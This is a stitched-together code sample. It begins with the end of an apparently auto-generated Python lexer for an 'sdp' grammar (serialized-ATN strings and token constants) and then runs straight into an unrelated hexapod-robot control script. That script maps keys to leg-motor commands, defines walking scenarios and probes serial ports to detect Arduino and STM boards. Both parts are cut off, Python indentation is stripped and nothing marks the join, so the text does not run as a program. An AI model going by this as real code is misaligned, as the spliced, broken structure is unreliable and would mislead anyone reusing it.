buf.write("\2\u025e^\3\2\2\2\u025f\u0260\7M\2\2\u0260`\3\2\2\2\u0261")
buf.write("\u0262\7N\2\2\u0262b\3\2\2\2\u0263\u0264\7O\2\2\u0264")
buf.write("d\3\2\2\2\u0265\u0266\7P\2\2\u0266f\3\2\2\2\u0267\u0268")
buf.write("\7Q\2\2\u0268h\3\2\2\2\u0269\u026a\7R\2\2\u026aj\3\2\2")
buf.write("\2\u026b\u026c\7S\2\2\u026cl\3\2\2\2\u026d\u026e\7T\2")
buf.write("\2\u026en\3\2\2\2\u026f\u0270\7U\2\2\u0270p\3\2\2\2\u0271")
buf.write("\u0272\7V\2\2\u0272r\3\2\2\2\u0273\u0274\7W\2\2\u0274")
buf.write("t\3\2\2\2\u0275\u0276\7X\2\2\u0276v\3\2\2\2\u0277\u0278")
buf.write("\7Y\2\2\u0278x\3\2\2\2\u0279\u027a\7Z\2\2\u027az\3\2\2")
buf.write("\2\u027b\u027c\7[\2\2\u027c|\3\2\2\2\u027d\u027e\7\\\2")
buf.write("\2\u027e~\3\2\2\2\u027f\u0280\7]\2\2\u0280\u0080\3\2\2")
buf.write("\2\u0281\u0282\7^\2\2\u0282\u0082\3\2\2\2\u0283\u0284")
buf.write("\7_\2\2\u0284\u0084\3\2\2\2\u0285\u0286\7`\2\2\u0286\u0086")
buf.write("\3\2\2\2\u0287\u0288\7a\2\2\u0288\u0088\3\2\2\2\u0289")
buf.write("\u028a\7b\2\2\u028a\u008a\3\2\2\2\u028b\u028c\7c\2\2\u028c")
buf.write("\u008c\3\2\2\2\u028d\u028e\7d\2\2\u028e\u008e\3\2\2\2")
buf.write("\u028f\u0290\7e\2\2\u0290\u0090\3\2\2\2\u0291\u0292\7")
buf.write("f\2\2\u0292\u0092\3\2\2\2\u0293\u0294\7g\2\2\u0294\u0094")
buf.write("\3\2\2\2\u0295\u0296\7h\2\2\u0296\u0096\3\2\2\2\u0297")
buf.write("\u0298\7i\2\2\u0298\u0098\3\2\2\2\u0299\u029a\7j\2\2\u029a")
buf.write("\u009a\3\2\2\2\u029b\u029c\7k\2\2\u029c\u009c\3\2\2\2")
buf.write("\u029d\u029e\7l\2\2\u029e\u009e\3\2\2\2\u029f\u02a0\7")
buf.write("m\2\2\u02a0\u00a0\3\2\2\2\u02a1\u02a2\7n\2\2\u02a2\u00a2")
buf.write("\3\2\2\2\u02a3\u02a4\7o\2\2\u02a4\u00a4\3\2\2\2\u02a5")
buf.write("\u02a6\7p\2\2\u02a6\u00a6\3\2\2\2\u02a7\u02a8\7q\2\2\u02a8")
buf.write("\u00a8\3\2\2\2\u02a9\u02aa\7r\2\2\u02aa\u00aa\3\2\2\2")
buf.write("\u02ab\u02ac\7s\2\2\u02ac\u00ac\3\2\2\2\u02ad\u02ae\7")
buf.write("t\2\2\u02ae\u00ae\3\2\2\2\u02af\u02b0\7u\2\2\u02b0\u00b0")
buf.write("\3\2\2\2\u02b1\u02b2\7v\2\2\u02b2\u00b2\3\2\2\2\u02b3")
buf.write("\u02b4\7w\2\2\u02b4\u00b4\3\2\2\2\u02b5\u02b6\7x\2\2\u02b6")
buf.write("\u00b6\3\2\2\2\u02b7\u02b8\7y\2\2\u02b8\u00b8\3\2\2\2")
buf.write("\u02b9\u02ba\7z\2\2\u02ba\u00ba\3\2\2\2\u02bb\u02bc\7")
buf.write("{\2\2\u02bc\u00bc\3\2\2\2\u02bd\u02be\7|\2\2\u02be\u00be")
buf.write("\3\2\2\2\u02bf\u02c0\7}\2\2\u02c0\u00c0\3\2\2\2\u02c1")
buf.write("\u02c2\7~\2\2\u02c2\u00c2\3\2\2\2\u02c3\u02c4\7\177\2")
buf.write("\2\u02c4\u00c4\3\2\2\2\u02c5\u02c6\7\u0080\2\2\u02c6\u00c6")
buf.write("\3\2\2\2\u02c7\u02c8\7\2\2\2\u02c8\u00c8\3\2\2\2\u02c9")
buf.write("\u02ca\7\3\2\2\u02ca\u00ca\3\2\2\2\u02cb\u02cc\7\4\2\2")
buf.write("\u02cc\u00cc\3\2\2\2\u02cd\u02ce\7\5\2\2\u02ce\u00ce\3")
buf.write("\2\2\2\u02cf\u02d0\7\6\2\2\u02d0\u00d0\3\2\2\2\u02d1\u02d2")
buf.write("\7\7\2\2\u02d2\u00d2\3\2\2\2\u02d3\u02d4\7\b\2\2\u02d4")
buf.write("\u00d4\3\2\2\2\u02d5\u02d6\7\t\2\2\u02d6\u00d6\3\2\2\2")
buf.write("\u02d7\u02d8\7\n\2\2\u02d8\u00d8\3\2\2\2\u02d9\u02da\7")
buf.write("\r\2\2\u02da\u00da\3\2\2\2\u02db\u02dc\7\16\2\2\u02dc")
buf.write("\u00dc\3\2\2\2\u02dd\u02de\7\20\2\2\u02de\u00de\3\2\2")
buf.write("\2\u02df\u02e0\7\21\2\2\u02e0\u00e0\3\2\2\2\u02e1\u02e2")
buf.write("\7\22\2\2\u02e2\u00e2\3\2\2\2\u02e3\u02e4\7\23\2\2\u02e4")
buf.write("\u00e4\3\2\2\2\u02e5\u02e6\7\24\2\2\u02e6\u00e6\3\2\2")
buf.write("\2\u02e7\u02e8\7\25\2\2\u02e8\u00e8\3\2\2\2\u02e9\u02ea")
buf.write("\7\26\2\2\u02ea\u00ea\3\2\2\2\u02eb\u02ec\7\27\2\2\u02ec")
buf.write("\u00ec\3\2\2\2\u02ed\u02ee\7\30\2\2\u02ee\u00ee\3\2\2")
buf.write("\2\u02ef\u02f0\7\31\2\2\u02f0\u00f0\3\2\2\2\u02f1\u02f2")
buf.write("\7\32\2\2\u02f2\u00f2\3\2\2\2\u02f3\u02f4\7\33\2\2\u02f4")
buf.write("\u00f4\3\2\2\2\u02f5\u02f6\7\34\2\2\u02f6\u00f6\3\2\2")
buf.write("\2\u02f7\u02f8\7\35\2\2\u02f8\u00f8\3\2\2\2\u02f9\u02fa")
buf.write("\7\36\2\2\u02fa\u00fa\3\2\2\2\u02fb\u02fc\7\37\2\2\u02fc")
buf.write("\u00fc\3\2\2\2\u02fd\u02fe\7 \2\2\u02fe\u00fe\3\2\2\2")
buf.write("\u02ff\u0300\7!\2\2\u0300\u0100\3\2\2\2\u0301\u0302\7")
buf.write("\u0081\2\2\u0302\u0102\3\2\2\2\u0303\u0304\7\u0082\2\2")
buf.write("\u0304\u0104\3\2\2\2\u0305\u0306\7\u0083\2\2\u0306\u0106")
buf.write("\3\2\2\2\u0307\u0308\7\u0084\2\2\u0308\u0108\3\2\2\2\u0309")
buf.write("\u030a\7\u0085\2\2\u030a\u010a\3\2\2\2\u030b\u030c\7\u0086")
buf.write("\2\2\u030c\u010c\3\2\2\2\u030d\u030e\7\u0087\2\2\u030e")
buf.write("\u010e\3\2\2\2\u030f\u0310\7\u0088\2\2\u0310\u0110\3\2")
buf.write("\2\2\u0311\u0312\7\u0089\2\2\u0312\u0112\3\2\2\2\u0313")
buf.write("\u0314\7\u008a\2\2\u0314\u0114\3\2\2\2\u0315\u0316\7\u008b")
buf.write("\2\2\u0316\u0116\3\2\2\2\u0317\u0318\7\u008c\2\2\u0318")
buf.write("\u0118\3\2\2\2\u0319\u031a\7\u008d\2\2\u031a\u011a\3\2")
buf.write("\2\2\u031b\u031c\7\u008e\2\2\u031c\u011c\3\2\2\2\u031d")
buf.write("\u031e\7\u008f\2\2\u031e\u011e\3\2\2\2\u031f\u0320\7\u0090")
buf.write("\2\2\u0320\u0120\3\2\2\2\u0321\u0322\7\u0091\2\2\u0322")
buf.write("\u0122\3\2\2\2\u0323\u0324\7\u0092\2\2\u0324\u0124\3\2")
buf.write("\2\2\u0325\u0326\7\u0093\2\2\u0326\u0126\3\2\2\2\u0327")
buf.write("\u0328\7\u0094\2\2\u0328\u0128\3\2\2\2\u0329\u032a\7\u0095")
buf.write("\2\2\u032a\u012a\3\2\2\2\u032b\u032c\7\u0096\2\2\u032c")
buf.write("\u012c\3\2\2\2\u032d\u032e\7\u0097\2\2\u032e\u012e\3\2")
buf.write("\2\2\u032f\u0330\7\u0098\2\2\u0330\u0130\3\2\2\2\u0331")
buf.write("\u0332\7\u0099\2\2\u0332\u0132\3\2\2\2\u0333\u0334\7\u009a")
buf.write("\2\2\u0334\u0134\3\2\2\2\u0335\u0336\7\u009b\2\2\u0336")
buf.write("\u0136\3\2\2\2\u0337\u0338\7\u009c\2\2\u0338\u0138\3\2")
buf.write("\2\2\u0339\u033a\7\u009d\2\2\u033a\u013a\3\2\2\2\u033b")
buf.write("\u033c\7\u009e\2\2\u033c\u013c\3\2\2\2\u033d\u033e\7\u009f")
buf.write("\2\2\u033e\u013e\3\2\2\2\u033f\u0340\7\u00a0\2\2\u0340")
buf.write("\u0140\3\2\2\2\u0341\u0342\7\u00a1\2\2\u0342\u0142\3\2")
buf.write("\2\2\u0343\u0344\7\u00a2\2\2\u0344\u0144\3\2\2\2\u0345")
buf.write("\u0346\7\u00a3\2\2\u0346\u0146\3\2\2\2\u0347\u0348\7\u00a4")
buf.write("\2\2\u0348\u0148\3\2\2\2\u0349\u034a\7\u00a5\2\2\u034a")
buf.write("\u014a\3\2\2\2\u034b\u034c\7\u00a6\2\2\u034c\u014c\3\2")
buf.write("\2\2\u034d\u034e\7\u00a7\2\2\u034e\u014e\3\2\2\2\u034f")
buf.write("\u0350\7\u00a8\2\2\u0350\u0150\3\2\2\2\u0351\u0352\7\u00a9")
buf.write("\2\2\u0352\u0152\3\2\2\2\u0353\u0354\7\u00aa\2\2\u0354")
buf.write("\u0154\3\2\2\2\u0355\u0356\7\u00ab\2\2\u0356\u0156\3\2")
buf.write("\2\2\u0357\u0358\7\u00ac\2\2\u0358\u0158\3\2\2\2\u0359")
buf.write("\u035a\7\u00ad\2\2\u035a\u015a\3\2\2\2\u035b\u035c\7\u00ae")
buf.write("\2\2\u035c\u015c\3\2\2\2\u035d\u035e\7\u00af\2\2\u035e")
buf.write("\u015e\3\2\2\2\u035f\u0360\7\u00b0\2\2\u0360\u0160\3\2")
buf.write("\2\2\u0361\u0362\7\u00b1\2\2\u0362\u0162\3\2\2\2\u0363")
buf.write("\u0364\7\u00b2\2\2\u0364\u0164\3\2\2\2\u0365\u0366\7\u00b3")
buf.write("\2\2\u0366\u0166\3\2\2\2\u0367\u0368\7\u00b4\2\2\u0368")
buf.write("\u0168\3\2\2\2\u0369\u036a\7\u00b5\2\2\u036a\u016a\3\2")
buf.write("\2\2\u036b\u036c\7\u00b6\2\2\u036c\u016c\3\2\2\2\u036d")
buf.write("\u036e\7\u00b7\2\2\u036e\u016e\3\2\2\2\u036f\u0370\7\u00b8")
buf.write("\2\2\u0370\u0170\3\2\2\2\u0371\u0372\7\u00b9\2\2\u0372")
buf.write("\u0172\3\2\2\2\u0373\u0374\7\u00ba\2\2\u0374\u0174\3\2")
buf.write("\2\2\u0375\u0376\7\u00bb\2\2\u0376\u0176\3\2\2\2\u0377")
buf.write("\u0378\7\u00bc\2\2\u0378\u0178\3\2\2\2\u0379\u037a\7\u00bd")
buf.write("\2\2\u037a\u017a\3\2\2\2\u037b\u037c\7\u00be\2\2\u037c")
buf.write("\u017c\3\2\2\2\u037d\u037e\7\u00bf\2\2\u037e\u017e\3\2")
buf.write("\2\2\u037f\u0380\7\u00c0\2\2\u0380\u0180\3\2\2\2\u0381")
buf.write("\u0382\7\u00c1\2\2\u0382\u0182\3\2\2\2\u0383\u0384\7\u00c2")
buf.write("\2\2\u0384\u0184\3\2\2\2\u0385\u0386\7\u00c3\2\2\u0386")
buf.write("\u0186\3\2\2\2\u0387\u0388\7\u00c4\2\2\u0388\u0188\3\2")
buf.write("\2\2\u0389\u038a\7\u00c5\2\2\u038a\u018a\3\2\2\2\u038b")
buf.write("\u038c\7\u00c6\2\2\u038c\u018c\3\2\2\2\u038d\u038e\7\u00c7")
buf.write("\2\2\u038e\u018e\3\2\2\2\u038f\u0390\7\u00c8\2\2\u0390")
buf.write("\u0190\3\2\2\2\u0391\u0392\7\u00c9\2\2\u0392\u0192\3\2")
buf.write("\2\2\u0393\u0394\7\u00ca\2\2\u0394\u0194\3\2\2\2\u0395")
buf.write("\u0396\7\u00cb\2\2\u0396\u0196\3\2\2\2\u0397\u0398\7\u00cc")
buf.write("\2\2\u0398\u0198\3\2\2\2\u0399\u039a\7\u00cd\2\2\u039a")
buf.write("\u019a\3\2\2\2\u039b\u039c\7\u00ce\2\2\u039c\u019c\3\2")
buf.write("\2\2\u039d\u039e\7\u00cf\2\2\u039e\u019e\3\2\2\2\u039f")
buf.write("\u03a0\7\u00d0\2\2\u03a0\u01a0\3\2\2\2\u03a1\u03a2\7\u00d1")
buf.write("\2\2\u03a2\u01a2\3\2\2\2\u03a3\u03a4\7\u00d2\2\2\u03a4")
buf.write("\u01a4\3\2\2\2\u03a5\u03a6\7\u00d3\2\2\u03a6\u01a6\3\2")
buf.write("\2\2\u03a7\u03a8\7\u00d4\2\2\u03a8\u01a8\3\2\2\2\u03a9")
buf.write("\u03aa\7\u00d5\2\2\u03aa\u01aa\3\2\2\2\u03ab\u03ac\7\u00d6")
buf.write("\2\2\u03ac\u01ac\3\2\2\2\u03ad\u03ae\7\u00d7\2\2\u03ae")
buf.write("\u01ae\3\2\2\2\u03af\u03b0\7\u00d8\2\2\u03b0\u01b0\3\2")
buf.write("\2\2\u03b1\u03b2\7\u00d9\2\2\u03b2\u01b2\3\2\2\2\u03b3")
buf.write("\u03b4\7\u00da\2\2\u03b4\u01b4\3\2\2\2\u03b5\u03b6\7\u00db")
buf.write("\2\2\u03b6\u01b6\3\2\2\2\u03b7\u03b8\7\u00dc\2\2\u03b8")
buf.write("\u01b8\3\2\2\2\u03b9\u03ba\7\u00dd\2\2\u03ba\u01ba\3\2")
buf.write("\2\2\u03bb\u03bc\7\u00de\2\2\u03bc\u01bc\3\2\2\2\u03bd")
buf.write("\u03be\7\u00df\2\2\u03be\u01be\3\2\2\2\u03bf\u03c0\7\u00e0")
buf.write("\2\2\u03c0\u01c0\3\2\2\2\u03c1\u03c2\7\u00e1\2\2\u03c2")
buf.write("\u01c2\3\2\2\2\u03c3\u03c4\7\u00e2\2\2\u03c4\u01c4\3\2")
buf.write("\2\2\u03c5\u03c6\7\u00e3\2\2\u03c6\u01c6\3\2\2\2\u03c7")
buf.write("\u03c8\7\u00e4\2\2\u03c8\u01c8\3\2\2\2\u03c9\u03ca\7\u00e5")
buf.write("\2\2\u03ca\u01ca\3\2\2\2\u03cb\u03cc\7\u00e6\2\2\u03cc")
buf.write("\u01cc\3\2\2\2\u03cd\u03ce\7\u00e7\2\2\u03ce\u01ce\3\2")
buf.write("\2\2\u03cf\u03d0\7\u00e8\2\2\u03d0\u01d0\3\2\2\2\u03d1")
buf.write("\u03d2\7\u00e9\2\2\u03d2\u01d2\3\2\2\2\u03d3\u03d4\7\u00ea")
buf.write("\2\2\u03d4\u01d4\3\2\2\2\u03d5\u03d6\7\u00eb\2\2\u03d6")
buf.write("\u01d6\3\2\2\2\u03d7\u03d8\7\u00ec\2\2\u03d8\u01d8\3\2")
buf.write("\2\2\u03d9\u03da\7\u00ed\2\2\u03da\u01da\3\2\2\2\u03db")
buf.write("\u03dc\7\u00ee\2\2\u03dc\u01dc\3\2\2\2\u03dd\u03de\7\u00ef")
buf.write("\2\2\u03de\u01de\3\2\2\2\u03df\u03e0\7\u00f0\2\2\u03e0")
buf.write("\u01e0\3\2\2\2\u03e1\u03e2\7\u00f1\2\2\u03e2\u01e2\3\2")
buf.write("\2\2\u03e3\u03e4\7\u00f2\2\2\u03e4\u01e4\3\2\2\2\u03e5")
buf.write("\u03e6\7\u00f3\2\2\u03e6\u01e6\3\2\2\2\u03e7\u03e8\7\u00f4")
buf.write("\2\2\u03e8\u01e8\3\2\2\2\u03e9\u03ea\7\u00f5\2\2\u03ea")
buf.write("\u01ea\3\2\2\2\u03eb\u03ec\7\u00f6\2\2\u03ec\u01ec\3\2")
buf.write("\2\2\u03ed\u03ee\7\u00f7\2\2\u03ee\u01ee\3\2\2\2\u03ef")
buf.write("\u03f0\7\u00f8\2\2\u03f0\u01f0\3\2\2\2\u03f1\u03f2\7\u00f9")
buf.write("\2\2\u03f2\u01f2\3\2\2\2\u03f3\u03f4\7\u00fa\2\2\u03f4")
buf.write("\u01f4\3\2\2\2\u03f5\u03f6\7\u00fb\2\2\u03f6\u01f6\3\2")
buf.write("\2\2\u03f7\u03f8\7\u00fc\2\2\u03f8\u01f8\3\2\2\2\u03f9")
buf.write("\u03fa\7\u00fd\2\2\u03fa\u01fa\3\2\2\2\u03fb\u03fc\7\u00fe")
buf.write("\2\2\u03fc\u01fc\3\2\2\2\u03fd\u03fe\7\u00ff\2\2\u03fe")
buf.write("\u01fe\3\2\2\2\u03ff\u0400\7\u0100\2\2\u0400\u0200\3\2")
buf.write("\2\2\u0401\u0402\7\u0101\2\2\u0402\u0202\3\2\2\2\3\2\2")
return buf.getvalue()
class sdpLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
TAB = 1
LF = 2
CR = 3
SPACE = 4
EXCLAMATION = 5
QUOTE = 6
HASH = 7
DOLLAR = 8
PERCENT = 9
AMPERSAND = 10
APOSTROPHE = 11
LEFT_PAREN = 12
RIGHT_PAREN = 13
ASTERISK = 14
PLUS = 15
COMMA = 16
DASH = 17
PERIOD = 18
SLASH = 19
ZERO = 20
ONE = 21
TWO = 22
THREE = 23
FOUR = 24
FIVE = 25
SIX = 26
SEVEN = 27
EIGHT = 28
NINE = 29
COLON = 30
SEMICOLON = 31
LESS_THAN = 32
EQUALS = 33
GREATER_THAN = 34
QUESTION = 35
AT = 36
CAP_A = 37
CAP_B = 38
CAP_C = 39
CAP_D = 40
CAP_E = 41
CAP_F = 42
CAP_G = 43
CAP_H = 44
CAP_I = 45
CAP_J = 46
CAP_K = 47
CAP_L = 48
CAP_M = 49
CAP_N = 50
CAP_O = 51
CAP_P = 52
CAP_Q = 53
CAP_R = 54
CAP_S = 55
CAP_T = 56
CAP_U = 57
CAP_V = 58
CAP_W = 59
CAP_X = 60
CAP_Y = 61
CAP_Z = 62
LEFT_BRACE = 63
BACKSLASH = 64
RIGHT_BRACE = 65
CARAT = 66
UNDERSCORE = 67
ACCENT = 68
A = 69
B = 70
C = 71
D = 72
E = 73
F = 74
G = 75
H = 76
I = 77
J = 78
K = 79
L = 80
M = 81
N = 82
O = 83
P = 84
Q = 85
R = 86
S = 87
T = 88
U = 89
V = 90
W = 91
X = 92
Y = 93
Z = 94
LEFT_CURLY_BRACE = 95
PIPE = 96
RIGHT_CURLY_BRACE = 97
TILDE = 98
U_0000 = 99
U_0001 = 100
U_0002 = 101
U_0003 = 102
U_0004 = 103
U_0005 = 104
U_0006 = 105
U_0007 = 106
U_0008 = 107
U_000B = 108
U_000C = 109
U_000E = 110
U_000F = 111
U_0010 = 112
U_0011 = 113
U_0012 = 114
U_0013 = 115
U_0014 = 116
U_0015 = 117
U_0016 = 118
U_0017 = 119
U_0018 = 120
U_0019 = 121
U_001A = 122
U_001B = 123
U_001C = 124
U_001D = 125
U_001E = 126
U_001F = 127
U_007F = 128
U_0080 = 129
U_0081 = 130
U_0082 = 131
U_0083 = 132
U_0084 = 133
U_0085 = 134
U_0086 = 135
U_0087 = 136
U_0088 = 137
U_0089 = 138
U_008A = 139
U_008B = 140
U_008C = 141
U_008D = 142
U_008E = 143
U_008F = 144
U_0090 = 145
U_0091 = 146
U_0092 = 147
U_0093 = 148
U_0094 = 149
U_0095 = 150
U_0096 = 151
U_0097 = 152
U_0098 = 153
U_0099 = 154
U_009A = 155
U_009B = 156
U_009C = 157
U_009D = 158
U_009E = 159
U_009F = 160
U_00A0 = 161
U_00A1 = 162
U_00A2 = 163
U_00A3 = 164
U_00A4 = 165
U_00A5 = 166
U_00A6 = 167
U_00A7 = 168
U_00A8 = 169
U_00A9 = 170
U_00AA = 171
U_00AB = 172
U_00AC = 173
U_00AD = 174
U_00AE = 175
U_00AF = 176
U_00B0 = 177
U_00B1 = 178
U_00B2 = 179
U_00B3 = 180
U_00B4 = 181
U_00B5 = 182
U_00B6 = 183
U_00B7 = 184
U_00B8 = 185
U_00B9 = 186
U_00BA = 187
U_00BB = 188
U_00BC = 189
U_00BD = 190
U_00BE = 191
U_00BF = 192
U_00C0 = 193
U_00C1 = 194
U_00C2 = 195
U_00C3 = 196
U_00C4 = 197
U_00C5 = 198
U_00C6 = 199
U_00C7 = 200
U_00C8 = 201
U_00C9 = 202
U_00CA = 203
U_00CB = 204
U_00CC = 205
U_00CD = 206
U_00CE = 207
U_00CF = 208
U_00D0 = 209
U_00D1 = 210
U_00D2 = 211
U_00D3 = 212
U_00D4 = 213
U_00D5 = 214
U_00D6 = 215
U_00D7 = 216
U_00D8 = 217
U_00D9 = 218
U_00DA = 219
U_00DB = 220
U_00DC = 221
U_00DD = 222
U_00DE = 223
U_00DF = 224
U_00E0 = 225
U_00E1 = 226
U_00E2 = 227
U_00E3 = 228
U_00E4 = 229
U_00E5 = 230
U_00E6 = 231
U_00E7 = 232
U_00E8 = 233
U_00E9 = 234
U_00EA = 235
U_00EB = 236
U_00EC = 237
U_00ED = 238
U_00EE = 239
U_00EF = 240
U_00F0 = 241
U_00F1 = 242
U_00F2 = 243
U_00F3 = 244
U_00F4 = 245
U_00F5 = 246
#!/usr/bin/python3
# Repository: RobotTeam2/rMule
import time
import sys
import glob
#import serial
import re
import threading
import queue
import os
from logging import getLogger, StreamHandler, FileHandler, Formatter, DEBUG
import redis
#import redis_serial as serial   # NOTE: serial_ports()/setup_serial_ports() below still call serial.Serial; enable pyserial or this wrapper before using them.
client = redis.StrictRedis(host='node2.ceph.wator.xyz', port=6379, db=0)
logger = getLogger(__name__)
logger.setLevel(DEBUG)
stream_formatter = Formatter('%(message)s')
stream_handler = StreamHandler()
stream_handler.setLevel(DEBUG)
stream_handler.setFormatter(stream_formatter)
logger.addHandler(stream_handler)
os.makedirs("./log",exist_ok=True)
log_file_name = "./log/log-" + time.strftime("%Y%m%d-%H%M%S") + ".txt"
file_handler = FileHandler(log_file_name)
file_handler.setLevel(DEBUG)
file_formatter = Formatter('[%(asctime)s] %(message)s')
file_handler.setFormatter(file_formatter)
logger.addHandler(file_handler)
logger.propagate = False
key_command_map = {
b'\t':["motion",[["left"]]],
b'/':["motion",[["right"]]],
b'*':["scenario",["walk"]],
b'\x08':["scenario",["back"]], # Windows
b'\x7f':["scenario",["back"]], # Linux
b'7':["motor_command",["up"]],
b'8':["motor_id",0],
b'9':["motor_id",3],
b'-':["motor_command",["move", 0]],
b'4':["motor_command",["down"]],
b'5':["motor_id",1],
b'6':["motor_id",4],
b'+':["motor_command",["move",100]],
b'1':["motion",[["stm_init"]]],
b'2':["motor_id",2],
b'3':["motor_id",5],
b'\r':["command",["stop"]],
b'0':["command",["clear"]],
b'.':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
linux_esc_key_command_map = {
b'H':["motor_command",["up"]],
b'A':["motor_id",0],
b'5':["motor_id",3],
b'D':["motor_command",["down"]],
b'E':["motor_id",1],
b'C':["motor_id",4],
b'F':["motion",[["stm_init"]]],
b'B':["motor_id",2],
b'6':["motor_id",5],
b'2':["command",["clear"]],
b'3':["motor_id",999],
b'\x1b':["escape"],
b'[':["escape"]
}
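# The two maps above translate raw key presses into [category, argument] pairs that
# menu() dispatches: "motion" and "scenario" trigger canned sequences, "motor_id"
# selects a leg (999 means all legs), "motor_command" acts on the currently selected
# leg, and "escape" switches to the Linux escape-sequence map so keypad/cursor keys
# can be decoded.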
arduino_available = False
stm_available = False
legs = 0
scenario_repeat = 3
motor_height = []
motor_id_mapping = {}
id_motor_mapping = {}
default_motor_id_mapping_2legs = {0:"2",1:"5"}
#
# 2 legs (with the 2nd and 3rd Arduino boards removed)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# +-----+
# Back
#
default_motor_id_mapping_4legs = {0:"2",1:"3",2:"5",3:"6"}
#
# 4 legs (with the 3rd Arduino board removed)
#
# Front
# +-----+
# 0:"2" | | 2:"5"
# 1:"3" | | 3:"6"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
default_motor_id_mapping_6legs = {0:"2",1:"3",2:"4",3:"5",4:"6",5:"7"}
#
# 6 legs
#
# Front
# +-----+
# 0:"2" | | 3:"5"
# 1:"3" | | 4:"6"
# 2:"4" | | 5:"7"
# +-----+
# Back
#
# right: 0:"2",4:"6",2:"4"
# left : 3:"5",1:"3",5:"7"
#
arduino_id_mapping = {}
'''
scenario_walk = [
[["right"]],
[["wait",2.0]],
[["move",0,0,1],
["move",4,0,1],
["move",2,0,1]],
[["wait",1.0]],
[["move",3,100,1],
["move",1,100,1],
["move",5,100,1]],
[["wait",1.0]],
[["left"]],
[["wait",2.0]],
[["move",3,0,1],
["move",1,0,1],
["move",5,0,1]],
[["wait",1.0]],
[["move",0,100,1],
["move",4,100,1],
["move",2,100,1]],
[["wait",1.0]]
]
'''
left_front_earth = [
["move",1,100,1],
["move",3,100,1],
["move",5,100,1],
]
left_back_earth = [
["move",1,0,1],
["move",3,0,1],
["move",5,0,1],
]
left_front_air = [
["move",1,100,1],
["move",3,100,1],
["move",5,100,1],
]
left_back_air = [
["move",1,0,1],
["move",3,0,1],
["move",5,0,1],
]
right_front_earth = [
["move",0,100,1],
["move",2,100,1],
["move",4,100,1],
]
right_back_earth = [
["move",0,0,1],
["move",2,0,1],
["move",4,0,1],
]
right_front_air = [
["move",0,100,1],
["move",2,100,1],
["move",4,100,1],
]
right_back_air = [
["move",0,0,1],
["move",2,0,1],
["move",4,0,1],
]
wait_space = 2.0
# walk in 3 step.
scenario_walk = [
# move all legs to the front through the air.
[["right"]],
[["wait",wait_space]],
left_front_air,
[["wait",wait_space]],
[["left"]],
[["wait",wait_space]],
right_front_air,
[["wait",wait_space]],
# move short down all legs.
[["home"]],
[["wait",wait_space]],
# move the grounded legs to the back, then return to home.
left_back_earth,
right_back_earth,
[["home"]],
[["wait",1.0]],
]
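# scenario_walk in three phases: lean onto the right side and swing the left legs
# forward through the air, lean onto the left side and swing the right legs forward,
# then return to home and pull the grounded legs back to drive the body forward
# (a rough reading of the command names; the exact STM behaviour of "right"/"left"/
# "home" is defined in the firmware, outside this file).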
'''
scenario_back = [
[["left"]],
[["wait",5.0]],
[["move",0,0,1], ["move",3,0,0],
["move",1,0,0], ["move",4,0,1],
["move",2,0,1], ["move",5,0,0]],
[["wait",5.0]],
[["right"]],
[["wait",5.0]],
[["move",0,100,0], ["move",3,100,1],
["move",1,100,1], ["move",4,100,0],
["move",2,100,0], ["move",5,100,1]],
[["wait",5.0]]
]
'''
scenario_back = [
# move all legs to the back through the air.
[["right"]],
[["wait",1.0]],
left_back_air,
[["wait",1.0]],
[["left"]],
[["wait",1.0]],
right_back_air,
[["wait",1.0]],
# move short down all legs.
[["alldown"]],
[["wait",1.0]],
# move the grounded legs to the front.
left_front_earth,
right_front_earth,
[["wait",1.0]]
]
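# scenario_back mirrors scenario_walk: swing the airborne legs to the back, lower all
# legs, then move the grounded legs to the front so the body is pushed backwards.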
arduino_ports = []
stm_ports = []
arduino_ser = []
stm_ser = []
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch.encode('utf-8')
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
def serial_ports():
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(32)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# probe a fixed list of common USB / ACM serial device nodes
ports = ['/dev/ttyUSB0','/dev/ttyUSB1','/dev/ttyUSB2','/dev/ttyACM0']
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
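# setup_serial_ports() probes every candidate port at 115200 baud: it sends "who:" and
# waits (up to 60 s) for the peer to identify itself. Arduinos answer with "arduino"
# and, after an "info:," query, report the two motor ids they drive ("id0,<n>" /
# "id1,<n>"); STM boards answer with "stm". Detected Arduino ports are then sorted by
# their first motor id and used to fill motor_id_mapping, id_motor_mapping and
# arduino_id_mapping before the ports are (re)opened.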
def setup_serial_ports():
logger.debug("************************************")
logger.debug(" serial port set up start !! ")
logger.debug("************************************")
# detect arduino or stm
comlist = serial_ports()
temp_arduino_ports = []
logger.debug(comlist)
for port in comlist:
logger.debug(port)
ser = serial.Serial(port, 115200,timeout=5.0)
#if port == "/dev/ttyACM0":
# stm_ports.append(port)
# continue
line = ser.readline()
ser.write(b"who:\r\n")
logger.debug("[S] who:\r\n")
start_time = current_time = time.time()
search_arduino_ids = False
while current_time - start_time < 60.0:
line = ser.readline()
if len(line) > 0:
logger.debug("[R] %s" %line)
if not search_arduino_ids:
result = re.search(b"arduino",line)
if result:
logger.debug("arduino")
ser.write(b"info:,\r\n")
search_arduino_ids = True
else:
id0 = ((re.findall(b"id0,[1-9]+",line))[0])[4:]
id1 = ((re.findall(b"id1,[1-9]+",line))[0])[4:]
if id0 and id1:
logger.debug("port id0 = %s, id1 = %s" %(id0,id1))
